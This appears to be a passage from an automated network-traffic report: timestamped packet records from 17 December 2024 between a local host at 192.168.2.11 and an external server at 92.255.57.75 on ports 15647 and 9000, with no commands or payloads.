Dec 17, 2024 08:40:35.314474106 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.335721016 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.335921049 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.338737011 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.338758945 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.338841915 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.355201006 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.362469912 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.363296032 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.378041029 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.378221035 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.382956982 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.383048058 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.402712107 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.409926891 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.410058022 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.427575111 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.455827951 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.463368893 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.463392973 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.463452101 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.499267101 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.499376059 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.527353048 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.554343939 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.560332060 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.560805082 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.567070961 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.567178965 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.585326910 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.585397005 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.585444927 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.589844942 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.589993954 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.589998007 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.591417074 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.591430902 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.591468096 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.591486931 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.596873999 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.597249031 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.615536928 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.615552902 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.615593910 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.648588896 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.648667097 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.675458908 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.675553083 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.681955099 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.682014942 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.705286026 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.705353022 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.711103916 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.711162090 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.731664896 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.731766939 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.743244886 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.743282080 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.743325949 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.765727997 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.765871048 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.765923977 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.770663023 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.770730019 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.770801067 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.775283098 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.775338888 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.775377989 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.778508902 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.779149055 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.780209064 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.780256987 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.780319929 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.801937103 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.802007914 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.802028894 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.802063942 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.804135084 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.804203987 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.825282097 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.825403929 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.851562023 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.851830006 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.861929893 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.863890886 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.866688967 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.866743088 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.866878033 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.889182091 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.890433073 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.899430990 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.899863005 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.918812037 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.921720982 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.923830986 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.926296949 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.926376104 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.930722952 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.931823969 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.951271057 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.953665018 CET	9000	50060	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.953888893 CET	9000	50060	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.953958988 CET	50060	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.954061031 CET	50060	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.969453096 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.971481085 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.971853018 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.987041950 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.992974997 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.993071079 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.993156910 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.994744062 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:35.994793892 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:35.994837999 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.008936882 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.011842966 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.037425041 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.038583040 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.040407896 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.040437937 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.040524960 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.045386076 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.047907114 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.051532984 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.051604986 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.056420088 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.058655024 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.058733940 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.058738947 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.064769030 CET	50061	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.071062088 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.071858883 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.073662043 CET	9000	50060	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.082765102 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.083864927 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.089281082 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.089729071 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.089798927 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.089816093 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.106904030 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.107995987 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.112875938 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.113908052 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.114003897 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.118110895 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.118195057 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.118267059 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.140899897 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.155281067 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.155373096 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.155597925 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.157345057 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.157627106 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.171353102 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.171854973 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.173269987 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.173322916 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.173322916 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.173358917 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.184458971 CET	9000	50061	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.185340881 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.185560942 CET	50061	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.185678959 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.185681105 CET	50061	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.203567028 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.204452991 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.212660074 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.212718964 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.212842941 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.233468056 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.233752966 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.235862970 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.241169930 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.243863106 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.258032084 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.259867907 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.260757923 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.277409077 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.278490067 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.298729897 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.300048113 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.300075054 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.300179958 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.302222013 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.302328110 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.305471897 CET	9000	50061	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.320310116 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.324326038 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.325297117 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.330740929 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.331974983 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.352267981 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.353329897 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.355609894 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.355698109 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.362786055 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.362822056 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.362943888 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.371942997 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.372006893 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.372129917 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.393395901 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.395853996 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.398627043 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.410367012 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.411873102 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.418745995 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.418883085 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.422425985 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.422527075 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.435467958 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.435782909 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.440319061 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.440454960 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.451734066 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.451864004 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.465027094 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.465101957 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.465203047 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.465229988 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.467418909 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.467597961 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.468549967 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.469203949 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.469254971 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.469321012 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.472536087 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.472613096 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.472650051 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.476459980 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.482732058 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.483892918 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.484076977 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.498226881 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.531773090 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.531933069 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.537653923 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.537853956 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.537879944 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.538134098 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.539977074 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.542269945 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.542489052 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.545641899 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.546132088 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.560379982 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.560549974 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.578262091 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.578362942 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.578402996 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.578402996 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.588306904 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.588344097 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.588404894 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.596236944 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.596277952 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.596390009 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.608174086 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.608283997 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.608381033 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.610584974 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.610652924 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.614149094 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.615895987 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.635658979 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.641654968 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.641755104 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.641861916 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.657084942 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.657931089 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.658915997 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.659878969 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.666023016 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.666449070 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.681344032 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.681411028 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.681766987 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.698441982 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.698688984 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.698843956 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.698949099 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.698998928 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.698998928 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.708030939 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.708133936 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.716212034 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.724188089 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.724267960 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.724287033 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.724390984 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.729732990 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.736387014 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.736450911 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.740901947 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.740999937 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.741053104 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.756576061 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.756926060 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.762274981 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.762411118 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.762701988 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.765465975 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.765670061 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.777645111 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.777734041 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.787441969 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.787535906 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.793504000 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.793606997 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.793617964 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.800225019 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.803919077 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.818458080 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.819953918 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.833549023 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.835979939 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.850788116 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.851901054 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.860846043 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.861711025 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.872669935 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.875883102 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.882555962 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.883152008 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.883192062 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.883274078 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.897507906 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.899899006 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.913376093 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.914182901 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.914501905 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:36.914530993 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:36.933324099 CET	50034	15647	192.168.2.11	92.255.57.75
